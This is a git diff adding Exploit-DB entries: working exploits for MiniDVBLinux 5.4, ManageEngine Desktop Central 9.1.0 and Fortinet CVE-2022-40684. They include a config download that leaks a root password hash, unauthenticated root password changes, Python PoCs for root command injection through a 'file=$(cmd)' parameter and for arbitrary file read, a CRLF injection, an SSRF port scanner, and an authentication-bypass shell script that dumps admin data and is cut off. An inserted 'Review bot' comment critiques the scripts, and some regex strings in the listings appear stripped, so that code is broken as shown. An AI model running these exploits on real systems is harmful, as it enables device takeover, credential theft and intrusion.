diff --git a/exploits/hardware/remote/51091.txt b/exploits/hardware/remote/51091.txt new file mode 100644 index 000000000..16d6f07bd --- /dev/null +++ b/exploits/hardware/remote/51091.txt @@ -0,0 +1,73 @@ +# Exploit Title: MiniDVBLinux <=5.4 Config Download Exploit +# Exploit Author: LiquidWorm + + +Vendor: MiniDVBLinux +Product web page: https://www.minidvblinux.de +Affected version: <=5.4 + +Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +way to convert a standard PC into a Multi Media Centre based on the +Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +Linux based Digital Video Recorder: Watch TV, Timer controlled +recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +via browser, and a lot more. MLD strives to be as small as possible, +modular, simple. It supports numerous hardware platforms, like classic +desktops in 32/64bit and also various low power ARM systems. + +Desc: The application is vulnerable to unauthenticated configuration +download when direct object reference is made to the backup function +using an HTTP GET request. This will enable the attacker to disclose +sensitive information and help her in authentication bypass, privilege +escalation and full system access. + +==================================================================== +/var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh: +------------------------------------------------------------ +01: /dev/null +07: cat /tmp/backup_config_$$.tgz +08: rm -rf /tmp/backup_config* +09: exit +10: fi +11: ?> +12:
+ +==================================================================== + +Tested on: MiniDVBLinux 5.4 + BusyBox v1.25.1 + Architecture: armhf, armhf-rpi2 + GNU/Linux 4.19.127.203 (armv7l) + VideoDiskRecorder 2.4.6 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5713 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php + + +24.09.2022 + +-- + + +> curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz +> mkdir configdir +> tar -xvzf config.tgz -C .\configdir +> cd configdir && cd etc +> type passwd +root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh +daemon:!:1:1::/: +ftp:!:40:2:FTP account:/:/bin/sh +user:!:500:500::/home/user:/bin/sh +nobody:!:65534:65534::/tmp: +_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin +> \ No newline at end of file diff --git a/exploits/hardware/remote/51093.txt b/exploits/hardware/remote/51093.txt new file mode 100644 index 000000000..0600039b6 --- /dev/null +++ b/exploits/hardware/remote/51093.txt 
@@ -0,0 +1,53 @@ +# Exploit Title: MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE) +# Exploit Author: LiquidWorm + +MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit + + +Vendor: MiniDVBLinux +Product web page: https://www.minidvblinux.de +Affected version: <=5.4 + +Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +way to convert a standard PC into a Multi Media Centre based on the +Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +Linux based Digital Video Recorder: Watch TV, Timer controlled +recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +via browser, and a lot more. MLD strives to be as small as possible, +modular, simple. It supports numerous hardware platforms, like classic +desktops in 32/64bit and also various low power ARM systems. + +Desc: The application allows the usage of the SVDRP protocol/commands +to be sent by a remote attacker to manipulate and/or control remotely +the TV. + +Tested on: MiniDVBLinux 5.4 + BusyBox v1.25.1 + Architecture: armhf, armhf-rpi2 + GNU/Linux 4.19.127.203 (armv7l) + VideoDiskRecorder 2.4.6 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5714 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php + + +24.09.2022 + +-- + + +Send a message to the TV screen: + +curl http://ip:8008/?site=commands§ion=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU! + +220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8 +250 Message queued +221 mld closing connection + +For more commands: + - https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands \ No newline at end of file diff --git a/exploits/hardware/remote/51094.txt b/exploits/hardware/remote/51094.txt new file mode 100644 index 000000000..21386a74a --- /dev/null +++ b/exploits/hardware/remote/51094.txt 
@@ -0,0 +1,156 @@ +# Exploit Title: MiniDVBLinux 5.4 - Change Root Password +# Exploit Author: LiquidWorm +MiniDVBLinux 5.4 Change Root Password PoC + + +Vendor: MiniDVBLinux +Product web page: https://www.minidvblinux.de +Affected version: <=5.4 + +Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +way to convert a standard PC into a Multi Media Centre based on the +Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +Linux based Digital Video Recorder: Watch TV, Timer controlled +recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +via browser, and a lot more. MLD strives to be as small as possible, +modular, simple. It supports numerous hardware platforms, like classic +desktops in 32/64bit and also various low power ARM systems. + +Desc: The application allows a remote attacker to change the root +password of the system without authentication (disabled by default) +and verification of previously assigned credential. Command execution +also possible using several POST parameters. 
+ +Tested on: MiniDVBLinux 5.4 + BusyBox v1.25.1 + Architecture: armhf, armhf-rpi2 + GNU/Linux 4.19.127.203 (armv7l) + VideoDiskRecorder 2.4.6 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5715 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php + + +24.09.2022 + +-- + + +Default root password: mld500 + +Change system password: +----------------------- + +POST /?site=setup§ion=System HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 +Cache-Control: max-age=0 +Connection: keep-alive +Content-Length: 778 +Content-Type: application/x-www-form-urlencoded +Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba +Host: ip:8008 +Origin: http://ip:8008 +Referer: http://ip:8008/?site=setup§ion=System +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 +sec-gpc: 1 + 
+APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save¶ms=&changed=SYSTEM_PASSWORD+ + + +Pretty post data: + +APT_UPGRADE_CHECK: 1 +APT_SYSTEM_ID: 1 +APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass +APT_PACKAGE_CLASS: stable +SYSTEM_NAME: MiniDVBLinux +SYSTEM_VERSION_command: /etc/setup/base.sh setversion +SYSTEM_VERSION: 5.4 +SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword +SYSTEM_PASSWORD: r00t +BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi +BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd +BUSYBOX_NTPD: 1 +LOG_LEVEL: 1 +SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog +SYSLOG_SIZE: +LANG_command: /etc/setup/locales.sh setlang +LANG: en_GB.UTF-8 +TIMEZONE_command: /etc/setup/locales.sh settimezone +TIMEZONE: Europe/Kumanovo +KEYMAP_command: /etc/setup/locales.sh setkeymap +KEYMAP: de-latin1 +action: save +params: +changed: SYSTEM_PASSWORD + + +Eenable webif password check: +----------------------------- + +POST /?site=setup§ion=System HTTP/1.1 + +APT_UPGRADE_CHECK: 1 +APT_SYSTEM_ID: 1 +APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass +APT_PACKAGE_CLASS: stable +SYSTEM_NAME: MiniDVBLinux +SYSTEM_VERSION_command: /etc/setup/base.sh setversion +SYSTEM_VERSION: 5.4 +SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword +SYSTEM_PASSWORD: 
+BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi +BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd +BUSYBOX_NTPD: 1 +LOG_LEVEL: 1 +SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog +SYSLOG_SIZE: +LANG_command: /etc/setup/locales.sh setlang +LANG: en_GB.UTF-8 +TIMEZONE_command: /etc/setup/locales.sh settimezone +TIMEZONE: Europe/Berlin +KEYMAP_command: /etc/setup/locales.sh setkeymap +KEYMAP: de-latin1 +WEBIF_PASSWORD_CHECK: 1 +action: save +params: +changed: WEBIF_PASSWORD_CHECK + + +Disable webif password check: +----------------------------- + +POST /?site=setup§ion=System HTTP/1.1 + +APT_UPGRADE_CHECK: 1 +APT_SYSTEM_ID: 1 +APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass +APT_PACKAGE_CLASS: stable +SYSTEM_NAME: MiniDVBLinux +SYSTEM_VERSION_command: /etc/setup/base.sh setversion +SYSTEM_VERSION: 5.4 +SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword +SYSTEM_PASSWORD: +BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi +BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd +BUSYBOX_NTPD: 1 +LOG_LEVEL: 1 +SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog +SYSLOG_SIZE: +LANG_command: /etc/setup/locales.sh setlang +LANG: en_GB.UTF-8 +TIMEZONE_command: /etc/setup/locales.sh settimezone +TIMEZONE: Europe/Berlin +KEYMAP_command: /etc/setup/locales.sh setkeymap +KEYMAP: de-latin1 +action: save +params: +changed: WEBIF_PASSWORD_CHECK \ No newline at end of file diff --git a/exploits/hardware/remote/51095.txt b/exploits/hardware/remote/51095.txt new file mode 100644 index 000000000..aa4a4ee9b --- /dev/null +++ b/exploits/hardware/remote/51095.txt 
@@ -0,0 +1,66 @@ +# Exploit Title: MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure +# Exploit Author: LiquidWorm +MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability + + +Vendor: MiniDVBLinux +Product web page: https://www.minidvblinux.de +Affected version: <=5.4 + +Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +way to convert a standard PC into a Multi Media Centre based on the +Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +Linux based Digital Video Recorder: Watch TV, Timer controlled +recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +via browser, and a lot more. MLD strives to be as small as possible, +modular, simple. It supports numerous hardware platforms, like classic +desktops in 32/64bit and also various low power ARM systems. + +Desc: The application suffers from an unauthenticated live stream +disclosure when /tpl/tv_action.sh is called and generates a snapshot +in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP). + +-------------------------------------------------------------------- +/var/www/tpl/tv_action.sh: +-------------------------- +01: #!/bin/sh +02: +03: header +04: +05: quality=60 +06: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")" +07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null +-------------------------------------------------------------------- + +Tested on: MiniDVBLinux 5.4 + BusyBox v1.25.1 + Architecture: armhf, armhf-rpi2 + GNU/Linux 4.19.127.203 (armv7l) + VideoDiskRecorder 2.4.6 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5716 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php + + +24.09.2022 + +-- + + +1. 
Generate screengrab: + - Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*" + - Response: +220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8 +250 Grabbed image /tmp/tv.jpg 60 +221 mld closing connection + +2. View screengrab: + - Request: curl http://ip:8008/images/tv.jpg + +3. Or use a browser: + - http://ip:8008/home?site=remotecontrol \ No newline at end of file diff --git a/exploits/hardware/remote/51096.py b/exploits/hardware/remote/51096.py new file mode 100755 index 000000000..e59fe6279 --- /dev/null +++ b/exploits/hardware/remote/51096.py 
@@ -0,0 +1,67 @@
+# Exploit Title: MiniDVBLinux 5.4 - Remote Root Command Injection
+# Exploit Author: LiquidWorm
+#!/usr/bin/env python3
+#
+#
+# MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability
+#
+#
+# Vendor: MiniDVBLinux
+# Product web page: https://www.minidvblinux.de
+# Affected version: <=5.4
+#
+# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
+# way to convert a standard PC into a Multi Media Centre based on the
+# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
+# Linux based Digital Video Recorder: Watch TV, Timer controlled
+# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
+# via browser, and a lot more. MLD strives to be as small as possible,
+# modular, simple. It supports numerous hardware platforms, like classic
+# desktops in 32/64bit and also various low power ARM systems.
+#
+# Desc: The application suffers from an OS command injection vulnerability.
+# This can be exploited to execute arbitrary commands with root privileges.
+# +# Tested on: MiniDVBLinux 5.4 +# BusyBox v1.25.1 +# Architecture: armhf, armhf-rpi2 +# GNU/Linux 4.19.127.203 (armv7l) +# VideoDiskRecorder 2.4.6 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2022-5717 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php +# +# +# 24.09.2022 +# + +import requests +import re,sys + +#test case 001 +#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT +#test case 004 +#http://ip:8008/?site=about&name=blind&file=$(id) +#cat: can't open 'uid=0(root)': No such file or directory +#cat: can't open 'gid=0(root)': No such file or directory +#test case 005 +#http://ip:8008/?site=about&name=blind&file=`id` +#cat: can't open 'uid=0(root)': No such file or directory +#cat: can't open 'gid=0(root)': No such file or directory + +if len(sys.argv) < 3: + print('MiniDVBLinux 5.4 Command Injection PoC') + print('Usage: ./mldhd_root2.py [url] [cmd]') + sys.exit(17) +else: + url = sys.argv[1] + cmd = sys.argv[2] + +req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')') +outz = re.search('
(.*?)
',req.text,flags=re.S).group() +print(outz.replace('
','').replace('
','')) \ No newline at end of file diff --git a/exploits/hardware/remote/51097.py b/exploits/hardware/remote/51097.py new file mode 100755 index 000000000..50903906c --- /dev/null +++ b/exploits/hardware/remote/51097.py 
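Review bot: The `#!/usr/bin/env python3` line is on line 3, below the two Exploit-DB header comments, so the kernel never honours it and the `./mldhd_root2.py` invocation given in the usage text will not run under python3 unless the interpreter is named explicitly; 51097.py (`./mldhd_fd.py`) has the same layout. On this rendering the pattern passed to `re.search` and both `replace` arguments have lost their contents (the hunk shows `re.search('` … `(.*?)` … `'`), presumably markup tag names dropped by the renderer, so the listing is not syntactically complete as shown — again also in 51097.py. `re.search(...).group()` raises AttributeError when the marker text is absent from the response instead of reporting that the target did not answer as expected, and `requests.get` carries no `timeout=`, so an unresponsive host hangs the script; a `None` check on the match and a timeout would make failures explicit. For defenders, the `file=$(` / backtick form of the `about` page request visible in the test-case comments is the artifact a web-log or WAF rule for this issue can key on.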
@@ -0,0 +1,61 @@ +# Exploit Title: MiniDVBLinux 5.4 - Arbitrary File Read +# Exploit Author: LiquidWorm +#!/usr/bin/env python3 +# +# +# MiniDVBLinux 5.4 Arbitrary File Read Vulnerability +# +# +# Vendor: MiniDVBLinux +# Product web page: https://www.minidvblinux.de +# Affected version: <=5.4 +# +# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +# way to convert a standard PC into a Multi Media Centre based on the +# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +# Linux based Digital Video Recorder: Watch TV, Timer controlled +# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +# via browser, and a lot more. MLD strives to be as small as possible, +# modular, simple. It supports numerous hardware platforms, like classic +# desktops in 32/64bit and also various low power ARM systems. +# +# Desc: The distribution suffers from an arbitrary file disclosure +# vulnerability. Using the 'file' GET parameter attackers can disclose +# arbitrary files on the affected device and disclose sensitive and system +# information. +# +# Tested on: MiniDVBLinux 5.4 +# BusyBox v1.25.1 +# Architecture: armhf, armhf-rpi2 +# GNU/Linux 4.19.127.203 (armv7l) +# VideoDiskRecorder 2.4.6 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2022-5719 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php +# +# +# 24.09.2022 +# + +import requests +import re,sys + +#test case 001 +#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT + +if len(sys.argv) < 3: + print('MiniDVBLinux 5.4 File Disclosure PoC') + print('Usage: ./mldhd_fd.py [url] [file]') + sys.exit(17) +else: + url = sys.argv[1] + fil = sys.argv[2] + +req = requests.get(url+'/?site=about&name=ZSL&file='+fil) +outz = re.search('
(.*?)
',req.text,flags=re.S).group() +print(outz.replace('
','').replace('
','')) \ No newline at end of file diff --git a/exploits/jsp/webapps/51082.txt b/exploits/jsp/webapps/51082.txt new file mode 100644 index 000000000..d3707ada3 --- /dev/null +++ b/exploits/jsp/webapps/51082.txt 
@@ -0,0 +1,234 @@ +# Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities +# Discovery by: Rafael Pedrero +# Discovery Date: 2021-02-14 +# Software Link : http://www.desktopcentral.com +# Tested Version: 9.1.0 (Build No: 91084) +# Tested on: Windows 10 + +# Vulnerability Type: CRLF injection (CRLF) - 1 + +CVSS v3: 6.1 +CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +CWE: CWE-93 + +Vulnerability description: CRLF injection vulnerability in ManageEngine +Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP +headers and conduct HTTP response splitting attacks via the fileName +parameter in a /STATE_ID/1613157927228/InvSWMetering.csv. + +Proof of concept: + +GET +https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true +HTTP/1.1 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 +Firefox/85.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +DNT: 1 +Connection: keep-alive +Referer: +https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering +Upgrade-Insecure-Requests: 1 +Content-Length: 0 +Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; +STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; +showRefMsg=false; summarypage=false; +DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; +JSESSIONID=0B20DEF653941DAF5748931B67972CDB; +JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 +Host: localhost + +Response: +HTTP/1.1 200 OK +Date: +Server: Apache +Pragma: public +Cache-Control: max-age=0 +Expires: Wed, 31 Dec 1969 16:00:00 PST +SET-COOKIE: 
JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; +Secure +Set-Cookie: buildNum=91084; Path=/ +Set-Cookie: showRefMsg=false; Path=/ +Set-Cookie: summarypage=false; Path=/ +Set-Cookie: dc_customerid=1; Path=/ +Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ +Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ +Set-Cookie: screenResolution=1280x1024; Path=/ +Content-Disposition: attachment; filename=any +Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv +X-dc-header: yes +Content-Length: 95 +Keep-Alive: timeout=5, max=20 +Connection: Keep-Alive +Content-Type: text/csv;charset=UTF-8 + + +# Vulnerability Type: CRLF injection (CRLF) - 2 + +CVSS v3: 6.1 +CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +CWE: CWE-93 + +Vulnerability description: CRLF injection vulnerability in ManageEngine +Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP +headers and conduct HTTP response splitting attacks via the fileName +parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf. 
+ +Proof of concept: + +GET +https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true +HTTP/1.1 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 +Firefox/85.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +DNT: 1 +Connection: keep-alive +Referer: +https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering +Upgrade-Insecure-Requests: 1 +Content-Length: 0 +Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; +STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; +showRefMsg=false; summarypage=false; +DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; +JSESSIONID=0B20DEF653941DAF5748931B67972CDB; +JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 +Host: localhost + + +HTTP/1.1 200 OK +Date: +Server: Apache +Pragma: public +Cache-Control: max-age=0 +Expires: Wed, 31 Dec 1969 16:00:00 PST +SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; +Secure +Set-Cookie: buildNum=91084; Path=/ +Set-Cookie: showRefMsg=false; Path=/ +Set-Cookie: summarypage=false; Path=/ +Set-Cookie: dc_customerid=1; Path=/ +Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ +Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ +Set-Cookie: screenResolution=1280x1024; Path=/ +Content-Disposition: attachment; filename=any +Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013 +X-dc-header: yes +Content-Length: 4470 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/pdf;charset=UTF-8 + + + +# Vulnerability Type: Server-Side Request Forgery (SSRF) + 
+CVSS v3: 8.0 +CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H +CWE: CWE-918 Server-Side Request Forgery (SSRF) + +Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability +in ManageEngine Desktop Central 9.1.0 allows an attacker can force a +vulnerable server to trigger malicious requests to third-party servers or +to internal resources. This vulnerability allows authenticated attacker +with network access via HTTP and can then be leveraged to launch specific +attacks such as a cross-site port attack, service enumeration, and various +other attacks. + +Proof of concept: + +Save this content in a python file (ex. ssrf_manageenginedesktop9.py), +change the variable sitevuln value with ip address: + +import argparse +from termcolor import colored +import requests +import urllib3 +import datetime +urllib3.disable_warnings() + +print(colored(''' +------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ +''',"red")) + +def smtpConfig_ssrf(target,port,d): + now1 = datetime.datetime.now() + text = '' + sitevuln = 'localhost' + url = 'https:// +'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin% +40manageengine.com +&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin% +40manageengine.com' + cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73; +buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false; +JSESSIONID=D10A9C62D985A0966647099E14C622F8; +DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0' + try: + response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 +(Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept': +'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language': +'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': ' +https://192.168.56.250:8383/smtpConfig.do','Cookie': + cookie,'Connection': 'keep-alive'},verify=False, timeout=10) + + text = response.text + now2 = 
datetime.datetime.now() + rest = (now2 - now1) + seconds = rest.total_seconds() + + if ('updateRefMsgCookie' in text): + return colored('Cookie lost',"yellow") + + if d == "0": + print ('Time response: ' + str(rest) + '\n' + text + '\n') + + if (seconds > 5.0): + return colored('open',"green") + else: + return colored('closed',"red") + + except: + now2 = datetime.datetime.now() + rest = (now2 - now1) + seconds = rest.total_seconds() + if (seconds > 10.0): + return colored('open',"green") + else: + return colored('closed',"red") + + return colored('unknown',"yellow") + + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 - +SSRF Open ports",required=True) + parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9 +- SSRF Open ports",required=True) + parser.add_argument('-d','--debug', help="ManageEngine Desktop Central +9 - SSRF Open ports (0 print or 1 no print)",required=False) + args = parser.parse_args() + timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug) + print (args.ip + ':' + args.port + ' ' + timeresp + '\n') + + + +And: + +$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080 + +------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ + +192.168.56.250:8080 open + +$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777 + +------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ + +192.168.56.250:7777 closed \ No newline at end of file diff --git a/exploits/multiple/webapps/51092.sh b/exploits/multiple/webapps/51092.sh new file mode 100755 index 000000000..9cf071510 --- /dev/null +++ b/exploits/multiple/webapps/51092.sh 
@@ -0,0 +1,55 @@
+# Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager)
+# Date: 13/10/2022
+# Exploit Author: Felipe Alcantara (Filiplain)
+# Vendor Homepage: https://www.fortinet.com/
+# Version:
+#FortiOS from 7.2.0 to 7.2.1
+#FortiOS from 7.0.0 to 7.0.6
+#FortiProxy 7.2.0
+#FortiProxy from 7.0.0 to 7.0.6
+#FortiSwitchManager 7.2.0
+#FortiSwitchManager 7.0.0
+# Tested on: Kali Linux
+# CVE : CVE-2022-40684
+
+# https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass
+
+# Usage: ./poc.sh
+# Example: ./poc.sh 10.10.10.120 8443
+
+#!/bin/bash
+
+red="\e[0;31m\033[1m"
+blue="\e[0;34m\033[1m"
+yellow="\e[0;33m\033[1m"
+end="\033[0m\e[0m"
+
+target=$1
+port=$2
+
+vuln () {
+
+echo -e "${yellow}[+] Dumping System Information: ${end}"
+
+timeout 10 curl -s -k -X $'GET' \
+    -H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out
+if [ "$?" == "0" ];then
+    grep "results" ./$target.out >/dev/null
+    if [ "$?" == "0" ];then
+        echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}"
+    else
+        rm -f ./$target.out
+        echo -e "${red}Not Vulnerable ${end}"
+    fi
